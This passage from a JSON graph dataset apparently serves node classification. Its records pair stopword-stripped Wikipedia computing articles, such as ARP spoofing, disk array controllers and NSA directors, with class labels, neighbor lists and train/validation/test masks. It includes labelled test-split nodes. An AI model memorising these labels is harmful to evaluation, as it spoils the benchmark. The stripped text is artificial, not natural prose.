    "text": "Disk_array:disk array disk array disk storage system contains multiple disk drives differentiated disk enclosure array cache memory advanced functionality like raid virtualization components typical disk array include typically disk array provides increased availability resiliency maintainability using additional redundant components controllers power supplies fans etc often point single points failure spofs eliminated design additionally disk array components often hot-swappable typically disk arrays divided categories primary vendors storage systems include coraid inc. datadirect networks dell emc fujitsu hewlett packard enterprise hitachi data systems huawei ibm infortrend netapp oracle corporation panasas pure storage companies often act oem vendors market storage components manufacture",
    "neighbors": [
      1675,
      1049,
      2339,
      7715,
      3366,
      1450,
      11179,
      2870,
      9277,
      10302,
      10303,
      8900,
      9285,
      1990,
      1993,
      7881,
      9677,
      2383,
      4438,
      7802,
      3042,
      1891,
      10340,
      1638,
      2421,
      4598,
      3450,
      3323,
      6014,
      9343
    ],
    "mask": "Train"
  },
  {
    "node_id": 6004,
    "label": 3,
    "text": "SpursEngine:spursengine spursengine microprocessor toshiba built media oriented coprocessor designed 3d- video processing consumer electronics set-top boxes computers spursengine processor also known quad core hd processor announced 20 september 2007 spursengine stream processor powered four synergistic processing elements spe also used cell processor featured sony playstation 3 processing elements fed chip h.264 mpeg-2 codecs controlled die host cpu connected chip pcie controller contrast cell processor chip cpu ppe similar work enable smoother interaction host spursengine toshiba also integrated simple proprietary 32-bit control core spursengine employs dedicated xdr dram working memory spursengine designed work much lower frequencies cell toshiba also optimized circuit layout spes reduce size 30 resulting chip consumes 10-20 w power spursengine accessible developer device driver developed windows linux systems software supporting spursengine limited primarily realm video editing encoding first generation spursengine processors specified follows april 2008 toshiba shipped samples spursengine se1000 device pcie-based reference board toshiba included spursengine processors qosmio laptops models f50 g50 g55 third quarter 2008",
    "neighbors": [
      9472,
      643,
      11657,
      6797,
      6415,
      9126,
      6311,
      306,
      7218,
      823,
      6072,
      8120,
      1985,
      10749,
      3025,
      6738,
      342,
      1115,
      4060,
      859,
      3677,
      9445,
      8937,
      10985,
      4587,
      508,
      2293,
      1784,
      3323,
      6268,
      6909
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6005,
    "label": 4,
    "text": "Kenneth_Minihan:kenneth minihan kenneth a. minihan born december 31 1943 former united states air force lieutenant general served director national security agency defense intelligence agency retiring may 1 1999 minihan born pampa texas entered united states air force 1966 distinguished graduate reserve officer training corps program florida state university also member phi kappa psi served senior intelligence officer air force senior staff officer positions pentagon headquarters tactical air command langley air force base virginia electronic security command kelly air force base texas defense intelligence agency washington d.c. national security agency fort george g. meade maryland commanded squadrons groups major air command united states overseas assistant chief staff intelligence headquarters united states air force washington d.c. director defense intelligence agency retiring united states air force minihan served president security affairs support association 1999 2002 currently serves managing director paladin capital group",
    "neighbors": [
      6017,
      8726,
      8478,
      1189,
      9517,
      1838,
      5308,
      1986,
      7107,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      3305,
      7145,
      2419,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 6006,
    "label": 3,
    "text": "Weitek:weitek weitek corporation american chip-design company originally focused floating-point units number commercial cpu designs early mid-1980s weitek designs could found powering number high-end designs parallel-processing supercomputers early 1990s cpu designs started including fpus built system basically “ free ” weitek made series attempts break general cpu graphics driver market 1995 company almost dead late 1996 remains purchased rockwell semiconductor systems quickly disappeared weitek started 1981 several intel engineers left form company weitek developed math coprocessors several systems including based motorola 68000 family 1064 intel-based i286 systems 1067 intel fpu design i386 fell far behind development weitek delivered 1167 later upgrades design led 2167 3167 4167 weitek would later deliver similar fpus mips architecture known xl line weitek fpus several differences compared x87 offerings lacking extended double precision register-file rather stack-based model orders increased supercomputer applications weitek found seriously disadvantaged fab becoming rather “ outdated ” hp approached deal use newer fabs proved advantageous soon hp ’ fabs open anyone weitek also worked hp design latest pa-risc design sold version known risc 8200 sold embedded design use laser printers late 1980s weitek saw new opportunity started developing frame buffers sun microsystems workstations early 1990s also introduced sparc power µp “ power-up ” technically referred wtl 8601 pin-compatible version sparc processor µp could dropped existing sparcstation 2 sparcstation ipx workstations ran 80 mhz double clock speed cpus replaced 8701 ran twice fast internally providing boost 50–60 overall speed due bus getting faster however pursue concept later generations sparc processors weitek turned frame-buffer experience pc market early 90s introduced series svga multimedia chipsets known “ power ” systems consisting two chips one drawing graphics known p9000 another handling output videopower 5x86 power series used number third-party designs based vesa local bus standard p9001 moved pci became fairly popular 1994 known viper designs diamond orchid final generation p9100 combined p9001 5286 single chip weitek adapters fairly successful early days 486 market fell use less expensive systems introduced host new players mid-1990s weitek attempted re-enter low-end market w464 486 w564 p5 systems used host machine ram frame buffer lower costs one reasons company purchased rockwell shortly shipped",
    "neighbors": [
      9665,
      7234,
      9955,
      10051,
      1480,
      5384,
      11627,
      9422,
      2895,
      1776,
      6256,
      6415,
      499,
      8944,
      1461,
      1399,
      5498
    ],
    "mask": "Test"
  },
  {
    "node_id": 6007,
    "label": 8,
    "text": "Web_Services_Flow_Language:web services flow language web services flow language 1.0 wsfl xml programming language proposed ibm 2001 describing web services compositions language considered two types compositions first type describing business processes collection web services second describing interactions partners wsfl proposed layered top web services description language 2003 ibm microsoft combined wsfl xlang bpel4ws submitted oasis standardization oasis published bpel4ws ws-bpel properly fit naming ws-* standards web services endpoint language wsel xml format proposed used description non-operational characteristics service endpoints quality-of-service cost security properties format proposed part report published web service flow language never gained wide acceptance",
    "neighbors": [
      10020,
      2501,
      8070,
      8262,
      4979,
      3323,
      9629,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 6008,
    "label": 9,
    "text": "MIIS_(programming_language):miis programming language miis meditech interpretive information system mumps-like programming language created a.neil pappalardo curt w. marble dec pdp mass general hospital 1964 1968 mumps evolution took two major directions mumps proper miis mumps became ansi iso-standard language many mumps implementations standardized compatible miis standardize became proprietary system instead example differences mumps miis value logical expression mumps may false zero 0 true non-zero canonically one 1 miis value false empty string value true string consisting ascii delete character code 127 decimal also philosophical difference dialects miis often takes approach code march along regardless possible errors mumps error prevent serious problems example encountering undefined variable mumps generates error miis treats nil 1980s brigham women hospital massachusetts used miis program data general mainframe 1986 scamc reported vancouver general hospital also integrated cardiology patient management system written miis miis language used programming library systems well health industry systems oclc library system one example also used create financial systems insurance brokers seen ireland uk late 1970s",
    "neighbors": [
      7076,
      8262
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6009,
    "label": 3,
    "text": "Vivante_Corporation:vivante corporation vivante corporation fabless semiconductor company headquartered sunnyvale california r center shanghai china company founded 2004 giquila focused portable gaming market company first product directx-compatible graphics processing unit gpu capable playing pc games 2007 giquila changed name vivante changed direction company focus design licensing embedded graphics processing unit designs company licensing mobile visual reality semiconductor solution providers serve embedded computing markets mobile gaming high-definition home entertainment image processing automotive display entertainment vivante named contributor hsa heterogeneous system architecture foundation 2015 verisilicon holdings co. ltd. acquired vivante corporation all-stock transaction since changing directions vivante developed range gpu cores compliant opengl es 1.1 2.0 standards well openvg standard created verisilicon support vulkan api 1.0 openvx 1.0 provided least 6 major desktop embedded operating systems 2d graphics products vector gpus summarized vendor term composition processing cores cpc sometimes mentioned feature single pass composition blending capability 8 higher gc300 gc320 gc350 gp355 openvg core additional listing gc200 gc420 nxp mentions gc255 presentation i.mx models nxp i.mx8 series come 2 units gc7000lite gc7000 vector processor 3d graphics products please see table legend notes listing announced 2009 least fifteen licensees used gpus twenty embedded designs application processors using vivante gpu technology vivante sold verisilicon arcturus gc8000 series released verisilicon supports newer technologies opencl 2.0 openvx 1.1 openvg 1.1 opengl es 3.2 opengl 4.0 vulkan 1.0 plans writing new drm/kms driver kernel driver vivante hardware since vivante previously put linux kernel component gnu general public license gpl instead maintaining proprietary blob free gallium3d-style device driver codice_1 surpassed vivante proprietary user-space driver benchmarks supports vivante product line gc400 series gc800 series gc1000 series gc2000 series gc3000 series gc4000 series",
    "neighbors": [
      1377,
      7745,
      7747,
      644,
      2788,
      10658,
      10945,
      2635,
      6705,
      9042,
      11282,
      2838,
      3511,
      7833,
      9851,
      4124,
      10971,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 6010,
    "label": 7,
    "text": "Powtoon:powtoon powtoon company sells cloud-based software saas creating animated presentations animated explainer videos powtoon founded january 2012 following 180k seed round investment december 2011 company released beta version august 2012 seen fast subscriber growth since december 2012 powtoon secured 600,000 investment los angeles-based venture capital firm startup minds february 2013 powtoon introduced free account option allowing users create animated videos exported youtube free videos include powtoon branding powtoon web-based animation software allows users create animated presentations manipulating pre-created objects imported images provided music user-created voice-overs powtoon uses apache flex engine generate xml file played powtoon online viewer exported youtube downloaded mp4 file powtoon also available google chrome store application edmodo.com",
    "neighbors": [
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 6011,
    "label": 3,
    "text": "The_Tower_of_Cabin:tower cabin tower cabin unusual spinoff fantasy role-playing video game series called japanese developer microcabin tower cabin released microcabin decided discontinue development msx tower cabin also ported nec pc9801 game player plays new microcabin employee wander microcabin headquarters building japan goal work various lead programmers developers making company successful similar japanese game known segagaga dreamcast player runs entire sega company president sega corporation game featured many characters xak series latok fray pixie two unlockable mini-games tower cabin short fighting game pixie fray text adventure called crusader took place within xak universe game setting takes place microcabin office building japan player descends ascends various floors throughout building carrying various business related tasks besides main character player several miscellaneous npc player talk order proceed game addition characters microcabin games make cameo appearance game played traveling office building various departments relaying information employees completing various business related tasks order ensure success microcabin company",
    "neighbors": [
      145,
      10339,
      4181,
      10534
    ],
    "mask": "Test"
  },
  {
    "node_id": 6012,
    "label": 2,
    "text": "List_of_tools_to_create_Live_USB_systems:list tools create live usb systems list utilities creating live usb multiboot means tool allows multiple systems usb stick well bootloader usb flash drive choose system load boot time",
    "neighbors": [
      7938,
      5123,
      3079,
      5895,
      7431,
      8076,
      4637,
      9377,
      6436,
      5930,
      7983,
      4145,
      4929,
      10306,
      4309,
      6371,
      5988,
      7914,
      2930,
      5618,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 6013,
    "label": 4,
    "text": "ARP_spoofing:arp spoofing computer networking arp spoofing arp cache poisoning arp poison routing technique attacker sends spoofed address resolution protocol arp messages onto local area network generally aim associate attacker mac address ip address another host default gateway causing traffic meant ip address sent attacker instead arp spoofing may allow attacker intercept data frames network modify traffic stop traffic often attack used opening attacks denial service man middle session hijacking attacks attack used networks use arp requires attacker direct access local network segment attacked address resolution protocol arp widely used communications protocol resolving internet layer addresses link layer addresses internet protocol ip datagram sent one host another local area network destination ip address must resolved mac address transmission via data link layer another host ip address known mac address needed broadcast packet sent local network packet known arp request destination machine ip arp request responds arp reply contains mac address ip arp stateless protocol network hosts automatically cache arp replies receive regardless whether network hosts requested even arp entries yet expired overwritten new arp reply packet received method arp protocol host authenticate peer packet originated behavior vulnerability allows arp spoofing occur basic principle behind arp spoofing exploit lack authentication arp protocol sending spoofed arp messages onto lan arp spoofing attacks run compromised host lan attacker machine connected directly target lan generally goal attack associate attacker host mac address ip address target host traffic meant target host sent attacker host attacker may choose inspect packets spying forwarding traffic actual default destination avoid discovery modify data forwarding man-in-the-middle attack launch denial-of-service attack causing packets network dropped simplest form certification use static read-only entries critical services arp cache host ip address-to-mac address mappings local arp cache may statically entered hosts n't need transmit arp requests entries exist static entries provide security spoofing result maintenance efforts address mappings systems network must generated distributed scale large network since mapping set pair machines resulting n n arp entries configured n machines present machine must arp entry every machine network n-1 arp entries n machines software detects arp spoofing generally relies form certification cross-checking arp responses uncertified arp responses blocked techniques may integrated dhcp server dynamic static ip addresses certified capability may implemented individual hosts may integrated ethernet switches network equipment existence multiple ip addresses associated single mac address may indicate arp spoof attack although legitimate uses configuration passive approach device listens arp replies network sends notification via email arp entry changes antiarp also provides windows-based spoofing prevention kernel level arpstar linux module kernel 2.6 linksys routers drops invalid packets violate mapping contains option repoison/heal virtualized environment kvm also provides security mechanism prevent mac spoofing guest running host additionally ethernet adapters provides mac vlan anti-spoofing features openbsd watches passively hosts impersonating local host notifies case attempt overwrite permanent entry operating systems react differently linux ignores unsolicited replies hand uses responses requests machines update cache solaris accepts updates entries timeout microsoft windows behavior arp cache configured several registry entries hkey_local_machine\\system\\currentcontrolset\\services\\tcpip\\parameters arpcachelife arpcacheminreferencelife arpuseethersnap arptrsingleroute arpalwayssourceroute arpretrycount techniques used arp spoofing also used implement redundancy network services example software allows backup server issue gratuitous arp request order take defective server transparently offer redundancy arp spoofing often used developers debug ip traffic two hosts switch use host host b communicating ethernet switch traffic would normally invisible third monitoring host m. developer configures mac address b b mac address also configures forward packets monitor traffic exactly man-in-the-middle attack tools used carry arp spoofing attacks",
    "neighbors": [
      7426,
      2947,
      138,
      10005,
      6295,
      10905,
      3486,
      2339,
      939,
      2996,
      6456,
      5561,
      7865,
      5437,
      8641,
      3395,
      4163,
      4689,
      4307,
      87,
      7895,
      4953,
      5472,
      9440,
      10343,
      2409,
      10092,
      5486,
      367,
      7411,
      4085,
      8439,
      2430,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 6014,
    "label": 3,
    "text": "Disk_array_controller:disk array controller disk array controller device manages physical disk drives presents computer logical units almost always implements hardware raid thus sometimes referred raid controller also often provides additional disk cache disk array controller name often improperly shortened disk controller two confused provide different functionality disk array controller provides front-end interfaces back-end interfaces single controller may use different protocols back-end front-end communication many enterprise controllers use fc front-end sata back-end modern enterprise architecture disk array controllers sometimes also called storage processors sps parts physically independent enclosures disk arrays placed storage area network san network-attached storage nas servers external disk arrays usually purchased integrated subsystem raid controllers disk drives power supplies management software controllers provide advanced functionality various vendors name differently simple disk array controller may fit inside computer either pci expansion card built onto motherboard controller usually provides host bus adapter hba functionality save physical space hence sometimes called raid adapter hardware raid controllers available long time always required expensive scsi hard drives aimed server high-end computing market scsi technology advantages include allowing 15 devices one bus independent data transfers hot-swapping much higher mtbf around 1997 introduction atapi-4 thus ultra-dma-mode 0 enabled fast data-transfers less cpu utilization first ata raid controllers introduced pci expansion cards raid systems made way consumer market users wanted fault-tolerance raid without investing expensive scsi drives ata drives make possible build raid systems lower cost scsi ata raid controllers lack dedicated buffer high-performance xor hardware parity calculation result ata raid performs relatively poorly compared scsi raid controllers additionally data safety suffers battery backup finish writes interrupted power outage hardware raid controllers present assembled raid volumes operating systems n't strictly required implement complete configuration assembly controller often basic features implemented open-source software driver extended features provided binary blobs directly hardware manufacturer normally raid controllers fully configured card bios operating system booted operating system booted proprietary configuration utilities available manufacturer controller exact feature set controller may specific manufacturer product unlike network interface controllers ethernet usually configured serviced entirely common operating system paradigms like ifconfig unix without need third-party tools manufacturer raid controller usually provides proprietary software tooling operating system deem support ensuring vendor lock-in contributing reliability issues example freebsd order access configuration adaptec raid controllers users required enable linux compatibility layer use linux tooling adaptec potentially compromising stability reliability security setup especially taking long term view mind however greatly depends controller whether appropriate hardware documentation available order write driver controllers open-source versions configuration utilities example codice_1 codice_2 available freebsd since freebsd 8.0 2009 well codice_3/codice_4 since 2015 supporting respective device drivers latter fact contributing code bloat operating systems implemented generic frameworks interfacing raid controller provide tools monitoring raid volume status well facilitation drive identification led blinking alarm management hot spare disk designations within operating system without reboot card bios example approach taken openbsd 2005 bio 4 pseudo-device driver bioctl utility provide volume status allow led/alarm/hotspare control well sensors including drive sensor health monitoring approach subsequently adopted extended netbsd 2007 well bioctl feature set intentionally kept minimum controller supported tool way initial configuration controller meant performed card bios initial configuration day-to-day monitoring repair possible unified generic tools bioctl set accomplish",
    "neighbors": [
      2051,
      1049,
      2339,
      11179,
      7983,
      2870,
      7863,
      8379,
      1990,
      1993,
      9677,
      3450,
      4438,
      1891,
      1637,
      1515,
      7151,
      6003,
      5492,
      2421,
      10102,
      7802,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 6015,
    "label": 1,
    "text": "DBEdit:dbedit dbedit 2 database editor connect oracle db2 mysql database provides jdbc driver runs windows linux solaris dbedit free open source software distributed gnu general public license source code hosted sourceforge dbedit developed jef van den ouweland first windows version released january 2006 used edit oracle db2 database written java later generic jdbc support added application could connect basically type database provides jdbc driver one year first release support operating systems linux solaris added last version dbedit released may 2012",
    "neighbors": [
      10340,
      9286,
      5677,
      7022,
      6797,
      7983,
      10413,
      823,
      9177,
      7100
    ],
    "mask": "Test"
  },
  {
    "node_id": 6016,
    "label": 9,
    "text": "Red_(programming_language):red programming language red computer programming language red made overcome limitations programming language rebol introduced 2011 nenad rakocevic red imperative functional programming language syntax general usage overlaps interpreted rebol language introduced 1997 implementation choices red intend create full stack programming language red used extremely high-level programming dsls guis well low-level programming operating systems device drivers key approach language two parts red/system red red seeks remain independent toolchain code generation therefore possible cross-compile red programs platform supports via command-line switch red red/system distributed open-source software modified bsd license runtime library distributed permissive boost software license version 0.6.4 red includes garbage collector simple gc red introduced netherlands february 2011 rebol boron conference author nenad rakocevic september 2011 red programming language presented larger audience software freedom day 2011 rakocevic long-time rebol developer known creator cheyenne http server red syntax semantics close rebol like rebol strongly supports metaprogramming domain-specific languages dsls therefore highly efficient tool dialecting creating embedded dsls red includes dialect called red/system c-level language provides system programming facilities red easy integrate tools languages dll libred lightweight around 1 mb also able cross-compile various platforms see cross compilation section create packages platforms require e.g. .apk android red also includes fully reactive cross-platform gui system based underlying reactive dataflow engine 2d drawing dialect comparable svg compile-time runtime macro support 40 standard datatypes following list red goals presented software freedom day 2011 red development planned done two phases red currently supports following cross-compilation targets important intended syntax examples red 64-bit support integer example overflow 32-bit integer quickly changing float go farther merely show syntax language following factorial example red following factorial example red/system simple case source code similar red version",
    "neighbors": [
      2304,
      9345,
      3462,
      8582,
      9224,
      2186,
      6797,
      8973,
      5521,
      10387,
      1435,
      9245,
      7326,
      8479,
      8609,
      3876,
      4777,
      5677,
      7983,
      9780,
      823,
      1849,
      6074,
      6718,
      8644,
      8262,
      9926,
      5833,
      8524,
      9166,
      7889,
      11219,
      11221,
      2519,
      477,
      225,
      6502,
      10470,
      8554,
      9964,
      8430,
      9454,
      10991,
      9714,
      499,
      3960,
      3705,
      7292,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6017,
    "label": 4,
    "text": "John_Michael_McConnell:john michael mcconnell john michael mcconnell born july 26 1943 former vice admiral united states navy naval career served director national security agency 1992 1996 civilian career includes serving united states director national intelligence 20 february 2007 27 january 2009 bush administration seven days obama administration currently vice chairman booz allen hamilton mcconnell born grew greenville south carolina mcconnell received commission united states navy 1967 worked intelligence officer j2 chairman joint chiefs staff united states secretary defense operation desert shield/storm dissolution soviet union developed improving information flow among intelligence agencies combat forces gulf war 1992 1996 mcconnell served director national security agency nsa led nsa adapted multi-polar threats brought end cold war leadership nsa routinely provided global intelligence information security services white house cabinet officials united states congress broad array military civilian intelligence customers also served member director central intelligence senior leadership team address major intelligence programmatic substantive issues 1992 1996 1996 mcconnell retired navy vice admiral 29 years service – 26 career intelligence officer addition many nation highest military awards meritorious service holds nation highest award service intelligence community also served chairman intelligence national security alliance mcconnell second person hold position director national intelligence nominated president george w. bush january 5 2007 sworn bolling air force base washington d.c. february 20 2007 mcconnell appointment post initially greeted broad bipartisan support although since attracted criticism advocating bush administration controversial policies nomination dni mcconnell served senior vice president consulting firm booz allen hamilton focusing intelligence national security areas 2005 confirmation dni 2007 also chairman board intelligence national security alliance premier not-for-profit nonpartisan private sector professional organization providing structure interactive forum thought leadership sharing ideas networking within intelligence national security communities whose members include leaders industry government academia tuesday august 14 2007 mcconnell visited texas house intelligence committee chairman silvestre reyes review border security granted wide-ranging interview el paso times newspaper surprised many intelligence community candor sensitive topics recent changes foreign intelligence surveillance act nsa warrantless surveillance controversy end interview mcconnell cautioned reporter chris roberts consider whether enemies u.s. could gain information shared leaving paper decide publish el paso times put entire unexpurgated interview website august 22 executive editor dionicio flores saying n't believe damaged national security endangered people resurgent taliban back charge parts afghanistan mcconnell told cnn february 27 2008 assessment differed one made january 2008 defense secretary robert gates january 24 2009 announced mcconnell would return booz allen senior vice president two months taking office mcconnell created series initiatives designed build foundation increased cooperation reform u.s. intelligence community ic plan dubbed 100 day plan integration collaboration focused efforts enable ic act unified enterprise collaborative manner focused six enterprise integration priorities 100 day plan accomplished launch civilian joint duty program improved security clearance processing times increased diversity intelligence workforce information sharing across community 500 day plan designed sustain momentum expanded set initiatives greater level participation set deepen integration community people processes technologies plan address new performance management framework entail six performance elements agencies must entail 100 day plan meant jump start series initiatives based deliberate planning process specific deadlines measures ensure needed reforms implemented 500 day plan started august 2007 designed accelerate sustain momentum expanded set initiatives broader ic participation contains 10 core initiatives tracked senior leadership intelligence community 33 enabling initiatives initiatives based six focus areas described 100 day plan top initiatives director mcconnell ended office near 400th day 500-day plan mcconnell approached congress early august 2007 need modernize fisa claiming two changes needed initial efforts began april – see factsheet first intelligence community required technology changes since 1978 obtain court orders effectively collect foreign intelligence foreign targets located overseas also argued telecoms sued violating nation wiretapping laws must protected liability—regardless veracity charges shortly thereafter mcconnell took active role capitol hill legislation drafted congress august 3 mcconnell announced strongly oppose house proposal n't strong enough heated debate congress updated fisa passing protect america act 2007 september 10 2007 testimony senate committee homeland security governmental affairs mcconnell asserted recently passed protect america act 2007 eased restrictions fisa helped foil major terror plot germany u.s. intelligence-community officials questioned accuracy mcconnell testimony urged office correct statement issued september 12 2007 critics cited incident example bush administration exaggerated claims contradictory statements surveillance activities counterterrorism officials familiar background mcconnell testimony said believe made inaccurate statements intentionally part strategy administration persuade congress make new eavesdropping law permanent officials said believed mcconnell gave wrong answer overwhelmed information merely mixed facts testimony mcconnell blamed death kidnapped american soldier iraq requirements fisa slowness courts however timeline later released showed delays mostly inside nsa casting doubt mcconnell truthfulness mcconnell speaking congressional panel defense protect america act said russian chinese foreign intelligence services nearly active cold war september 18 2007 testimony house judiciary committee mcconnell addressed nsa warrantless surveillance controversy saying agency conducted telephone surveillance americans without obtaining warrant advance since became director national intelligence february 2007 mcconnell called fisa foundational law important legacy protecting rights americans passed era watergate aftermath church pike investigations stressed changes honor legacy privacy foreign threats july 2008 director mcconnell issued directive icd 205 analysts build relationships outside experts topics concern intelligence community—a recommendation highlighted wmd commission report director mcconnell worked white house overhaul executive order 12333 outlines fundamental guidance intelligence agencies mcconnell believes update necessary incorporate intelligence community ’ new organizations new technologies methods redo expected help sixteen intelligence agencies work together reflect post 9/11 threat environment july 2008 president bush issued executive order 13470 amended 12333 one mcconnell last acts dni signed icd501 discovery dissemination retrieval information within intelligence community dramatically increase access several databases held various agencies community policy establishes rules govern disputes access granted dni final adjudicator resolve disputes organizations also established intelligence information integration program i2p leadership then-cio patrick gorman nsa-cio dr. prescott winter goal i2p create shared infrastructure family shared services means increase information access sharing collaboration throughout us intelligence community mcconnell led effort create integrated planning programming budgeting system fully integrate optimize capabilities intelligence community previously agency budget developed independently aggregated congress issuance icd106 strategic enterprise management ic sem intelligence community budget closely aligned strategic goals objectives requirements performance criteria icd 106 replaced icd 116 2011 early april 2010 admiral mcconnell called expanding powers dni giving tenure creating department intelligence dni oversee fully control settle continued fighting amongst agencies within various departments",
    "neighbors": [
      8726,
      1189,
      3495,
      9517,
      1838,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      9688,
      991,
      10207,
      7137,
      2405,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 6018,
    "label": 7,
    "text": "SAP_Converged_Cloud:sap converged cloud sap converged cloud private managed cloud developed marketed sap set cloud computing services offers managed private cloud based openstack technology-based public cloud used sap organization internal resources create mix different cloud computing environments made openstack services offers compute storage platform services accessible sap 2012 sap promoted aspects cloud computing october 2012 sap announced platform service offering called sap cloud platform may 2013 managed private cloud offering called s/4hana enterprise cloud service announced sap converged cloud announced january 2015 sap converged cloud managed sap business unit established 2015 named converged cloud unit headed markus riedinger unit manager converged cloud beta went live may 2017 included openstack technology-based storage compute network components shared new services made sap later designate dns service added well 2017 year sap charged superior cloud innovation customers sizes sap s/4hana cloud sap ariba sap successfactors sap cloud applications customers access complete portfolio cloud-based solutions support digital transformation journeys june 7 2017 sap announced company plans invest 1 billion cloud next two years business organizations want use cloud computing choice using private cloud cloud infrastructure run specifically single organization built third-party public cloud whereby service provider makes available applications storage resources general public decision use based number factors whether company operates highly regulated sector pharmaceuticals industry must comply rules regarding control security data business must bring services market quickly web applications developer first would opt private cloud security peace mind web developer would choose public cloud offering companies would operate mixture two also known hybrid cloud delivery employing hybrid delivery cloud strategy lets organizations use different cloud delivery services specific applications instance public cloud may cost-effective service compute-intensive task processing analytics data would remain local private comply regulations hybrid delivery strategy lets organizations run applications services across different clouds collocation data centers example benefit delivery mechanism organizations move app one geographic location another major storms different types hybrid clouds specific tasks infrastructure service iaas model hybrid cloud could use operating systems virtualization technologies public private cloud infrastructure provide cloud services models mix on-premises cloud public cloud technologies include platform service paas includes infrastructure services combined development tools middleware software service saas used develop packaged software however moving data cloud difficult procedure case software service saas difficult particularly incumbent cloud provider used proprietary software altered open source application way mitigate cloud migration difficulties architect applications cloud reduce eliminate dependencies cloud application stack capabilities cloud service provider another way select generic higher-level applications move cloud first place another method select open standards cloud computing best practice avoiding cloud migration problems use management platform support applications environment user organization likely use described using best-of-breed approach companies engage cloud professional services consultants help plan incorporate cloud services business operations consultants advise businesses whether use public private hybrid delivery model implement consume delivery models example cloud professional services consultants might recommend businesses interested cost savings place appropriate applications public cloud keep higher-security application private cloud hybrid cloud 2013 competitive vendor analysis report international data corporation market research firm authors state cloud professional services help companies map short-term long-term strategy use cloud way aids business goals common reason businesses engage cloud professional services assistance incorporating cloud technology existing environments plan implement cloud according study published february 2014 independent research firm technology business research inc according published reports use cloud professional services indicates businesses adequate internal resources knowledgeable implementing cloud sap converged cloud follows premise converged infrastructure integration compute storage networking components technologies self-provisioning pools shared resources supported services one benefits data center based converged infrastructure including converged infrastructure data center delivers cloud services manual tasks automated thus reducing time cost carry sap converged cloud supporting vmware hypervisors supports multiple operating systems microsoft red hat ubuntu etc supports wide range development environments based openstack technology means compatible public cloud platforms based openstack technology rackspace nebula sap converged cloud consultants work sap users help configure best cloud approach users receive advice implement cloud consistent manner get value cloud investment users also receive advice manage cloud sap cloud marketing—delivers information possible uses cloud services solutions identifies opportunities begin implementing cloud sap converged cloud includes security features businesses connect private cloud on-site network using software-defined networking technology multiple copies virtual lan vlan supplied providing method businesses connect firewall on-site network converged cloud appearing part on-site network backup service load balancing using f5 networks allows service load balancing across virtual servers cloud storage data stored off-site file systems server operating systems sap retains local backups postgresql swift containers 30 days user organizations choose 50gb 100gb one-terabyte blocks storage area network san storage server nodes high-availability clustering added instances microsoft windows server red hat enterprise linux suse linux enterprise server sap converged cloud service solution sap hana private service developed sap sap hana in-memory database migration services businesses want move sap hana platform system designed enable businesses analyze big data november 2016 sap opened walldorf first data centers host converged cloud according published reports data centers provide disaster recovery services high availability",
    "neighbors": [
      1801,
      6153,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      9762,
      6307,
      8998,
      5159,
      9766,
      6444,
      7983,
      8495,
      3121,
      823,
      7352,
      5178,
      2496,
      4289,
      1224,
      8520,
      3660,
      4429,
      7248,
      1362,
      467,
      9682,
      11221,
      11097,
      5210,
      8539,
      6367,
      4194,
      11646,
      5732,
      8170,
      3819,
      7660,
      8554,
      10090,
      9455,
      2170,
      5499,
      4604,
      253,
      8446
    ],
    "mask": "Train"
  },
  {
    "node_id": 6019,
    "label": 4,
    "text": "Cyber_resilience:cyber resilience cyber resilience refers entity ability continuously deliver intended outcome despite adverse cyber events cyber resilience evolving perspective rapidly gaining recognition concept essentially brings areas information security business continuity organizational resilience together entities potential need cyber resilience abilities include limited systems critical infrastructure business processes organizations societies nation-states adverse cyber events negatively impact availability integrity confidentiality networked systems associated information services events may intentional e.g cyber attack unintentional e.g failed software update caused humans nature combination thereof objective cyber resilience maintain entity ability deliver intended outcome continuously times means even regular delivery mechanisms failed crisis security breach concept also includes ability restore regular delivery mechanisms events well ability continuously change modify delivery mechanisms needed face new risks backups disaster recovery operations part process restoring delivery mechanisms resilience defined presidential policy directive ppd-21 ability prepare adapt changing conditions withstand recover rapidly disruptions cyber resilience focuses preventative detective reactive controls information technology environment assess gaps drive enhancements overall security posture entity cyber resilience review crr one framework assessment entity resiliency created department homeland security another framework created symantec based 5 pillars prepare/identify protect detect respond recover national institute standards technology special publication 800-160 volume 2 offers framework engineering secure reliable systems—treating adverse cyber events resiliency security issues particular 800-160 identifies fourteen techniques used improve resiliency cyber security consists technologies processes measures designed protect systems networks data cyber crimes effective cyber security reduces risk cyber attack protects entities organisations individuals deliberate exploitation systems networks technologies cyber resilience looks wider scope comprises cyber security business resilience cyber security effective without compromising usability systems robust continuity business plan resume operations cyber attack successful cyber resilience helps businesses recognize hackers advantage innovative tools element surprise target successful attempt concept helps business prepare prevent respond successfully recover intended secure state cultural shift organization sees security full-time job embedded security best practices day-to-day operations comparison cyber security cyber resilience requires business think differently agile handling attacks",
    "neighbors": [
      8640,
      9184,
      9569,
      3366,
      6514,
      3897,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 6020,
    "label": 3,
    "text": "Computer_compatibility:computer compatibility family computer models said compatible certain software runs one models also run models family computer models may differ performance reliability characteristic differences may affect outcome running software software compatibility refer compatibility particular software running particular cpu architecture intel powerpc software compatibility also refer ability software run particular operating system rarely compiled software compatible multiple different cpu architectures normally application compiled different cpu architectures operating systems allow compatible different system interpreted software hand normally run many different cpu architectures operating systems interpreter available architecture operating system software incompatibility occurs many times new software released newer version operating system incompatible older version operating system may miss features functionality software depends hardware compatibility refer compatibility computer hardware components particular cpu architecture bus motherboard operating system hardware compatible may always run highest stated performance nevertheless work legacy components example ram chips run lower sometimes higher clock rate rated hardware designed one operating system may work another device kernel drivers unavailable example much hardware mac os x proprietary hardware drivers unavailable use operating systems linux",
    "neighbors": [
      2948,
      5389,
